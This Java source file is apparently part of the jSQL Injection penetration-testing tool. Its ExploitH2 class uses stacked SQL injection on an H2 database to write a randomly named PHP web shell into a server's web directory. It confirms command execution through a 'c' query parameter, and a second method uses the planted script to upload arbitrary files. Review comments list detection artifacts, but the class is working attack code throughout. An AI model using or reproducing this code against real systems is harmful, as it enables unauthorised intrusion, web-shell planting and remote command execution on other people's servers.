1   package com.jsql.model.accessible.vendor;
2   
3   import com.jsql.model.InjectionModel;
4   import com.jsql.model.accessible.DataAccess;
5   import com.jsql.model.accessible.ResourceAccess;
6   import com.jsql.model.accessible.vendor.h2.ModelYamlH2;
7   import com.jsql.model.bean.util.Interaction;
8   import com.jsql.model.bean.util.Request;
9   import com.jsql.model.exception.JSqlException;
10  import com.jsql.model.exception.JSqlRuntimeException;
11  import com.jsql.util.LogLevelUtil;
12  import com.jsql.util.StringUtil;
13  import org.apache.commons.lang3.RandomStringUtils;
14  import org.apache.commons.lang3.StringUtils;
15  import org.apache.logging.log4j.LogManager;
16  import org.apache.logging.log4j.Logger;
17  import org.yaml.snakeyaml.Yaml;
18  
19  import java.io.File;
20  import java.io.FileInputStream;
21  import java.io.IOException;
22  import java.io.InputStream;
23  import java.net.http.HttpResponse;
24  import java.util.function.BinaryOperator;
25  
public class ExploitH2 {

    /**
     * Log4j logger sent to view.
     */
    private static final Logger LOGGER = LogManager.getRootLogger();
    private final InjectionModel injectionModel;
    /** Vendor templates (createTable / scriptSimple) loaded from the H2 exploit YAML resource. */
    private final ModelYamlH2 modelYaml;

    /**
     * Loads the H2 vendor YAML into {@link ModelYamlH2}.
     * <p>
     * NOTE(review): the default {@code new Yaml()} constructor is used (no
     * {@code SafeConstructor}/{@code LoaderOptions}); {@code loadAs} constrains the
     * root type but not nested tags. This is only acceptable while the loaded
     * document remains an in-package vendor resource and never user-supplied
     * input — confirm where {@code getExploit()} is sourced from.
     *
     * @param injectionModel model providing the vendor mediator, utilities and resource access
     */
    public ExploitH2(InjectionModel injectionModel) {
        this.injectionModel = injectionModel;
        var yaml = new Yaml();
        this.modelYaml = yaml.loadAs(
            injectionModel.getMediatorVendor().getH2().instance().getModelYaml().getResource().getExploit(),
            ModelYamlH2.class
        );
    }

    /**
     * Stages the web script from the {@code EXPLOIT_DOT_WEB} property through two
     * stacked queries (table creation, then script dump) and lets
     * {@code ResourceAccess.checkUrls} confirm which candidate URL serves it.
     * <p>
     * Observable artifacts for detection, all visible in this method: a
     * {@code CREATE TABLE} with a random 8-letter alphabetic name, a file written
     * at {@code pathExploit} with a random 8-letter {@code .php} name, and a
     * follow-up HTTP request to that file carrying the {@code c} query parameter.
     *
     * @param pathExploit filesystem directory the script is written into
     * @param urlExploit  base URL handed to {@code checkUrls} for candidate resolution
     * @return the URL {@code checkUrls} settles on; the confirmation lambda returns
     *         {@code StringUtils.EMPTY} when the confirm marker is not served
     */
    public String createWeb(String pathExploit, String urlExploit) {
        LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE Web target requirements: stack query, web+db on same machine, jdbc bridge");

        // Property holds a base64 script body; the SHELL_* placeholders are swapped
        // for the LEAD/TRAIL markers that the response matcher looks for.
        String bodyExploit = StringUtil.base64Decode(
                this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB)
            )
            .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
            .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);

        // Random identifiers: secure RNG, 8 alphabetic chars (no fixed signature string).
        var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
        // Single quotes in the body are replaced by double quotes; presumably to keep the
        // SQL string literal in the createTable template intact — confirm against the YAML.
        this.injectionModel.injectWithoutIndex(String.format(
            this.modelYaml.getRce().getCreateTable(),
            nameTable,
            nameTable, bodyExploit.replace("'", "\"")
        ), ResourceAccess.TBL_CREATE);
        var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
        // Second stacked query: dump the table content to pathExploit + nameExploit.
        this.injectionModel.injectWithoutIndex(String.format(
            this.modelYaml.getRce().getScriptSimple(),
            pathExploit + nameExploit,
            nameTable
        ), ResourceAccess.TBL_DUMP);

        // Confirmation callback for checkUrls. First argument is unused here
        // (same in createUpload); only urlSuccess is consumed.
        BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
            String result = this.injectionModel.getResourceAccess().callCommand(
                urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD
            );
            if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
                LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
                // EMPTY signals "not confirmed" to checkUrls; contrast createUpload,
                // which always returns urlSuccess.
                return StringUtils.EMPTY;
            }
            var request = new Request();
            request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB);
            request.setParameters(urlSuccess);
            this.injectionModel.sendToViews(request);
            return urlSuccess;
        };

        return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
    }

    /**
     * Stages the upload script from the {@code EXPLOIT_DOT_UPL} property, then
     * pushes {@code fileToUpload} through {@code ResourceAccess.upload} once
     * {@code checkUrls} resolves the script URL.
     * <p>
     * The table-creation / dump prelude is line-for-line the same as in
     * {@link #createWeb} apart from the property key; a private helper taking the
     * key would remove the duplication. Unlike {@code createWeb}, the callback here
     * returns {@code urlSuccess} on every path, including upload failure and
     * interruption, so {@code checkUrls} cannot distinguish those outcomes from
     * success; its return value is also discarded.
     *
     * @param pathExploit  filesystem directory the script is written into
     * @param urlExploit   base URL handed to {@code checkUrls}
     * @param fileToUpload local file streamed to the resolved script URL
     * @throws JSqlRuntimeException wrapping any {@link IOException} or {@link JSqlException} from the upload
     */
    public void createUpload(String pathExploit, String urlExploit, File fileToUpload) {
        String bodyExploit = StringUtil.base64Decode(
                this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL)
            )
            .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
            .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);

        var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
        this.injectionModel.injectWithoutIndex(String.format(
            this.modelYaml.getRce().getCreateTable(),
            nameTable,
            nameTable, bodyExploit.replace("'", "\"")
        ), ResourceAccess.TBL_CREATE);
        var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
        this.injectionModel.injectWithoutIndex(String.format(
            this.modelYaml.getRce().getScriptSimple(),
            pathExploit + nameExploit,
            nameTable
        ), ResourceAccess.TBL_DUMP);

        BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
            // try-with-resources closes the stream whether upload succeeds or throws.
            try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
                HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
                // Success marker is LEAD followed by "y" in the response body.
                if (result.body().contains(DataAccess.LEAD +"y")) {
                    LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
                } else {
                    LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
                }
            } catch (InterruptedException e) {
                // Logged at IGNORE level and the interrupt flag is restored for the caller.
                LOGGER.log(LogLevelUtil.IGNORE, e, e);
                Thread.currentThread().interrupt();
            } catch (IOException | JSqlException e) {
                // Cause is preserved in the wrapping runtime exception.
                throw new JSqlRuntimeException(e);
            }
            return urlSuccess;
        };

        this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
    }

    /**
     * @return the vendor YAML model loaded by the constructor
     */
    public ModelYamlH2 getModelYaml() {
        return this.modelYaml;
    }
}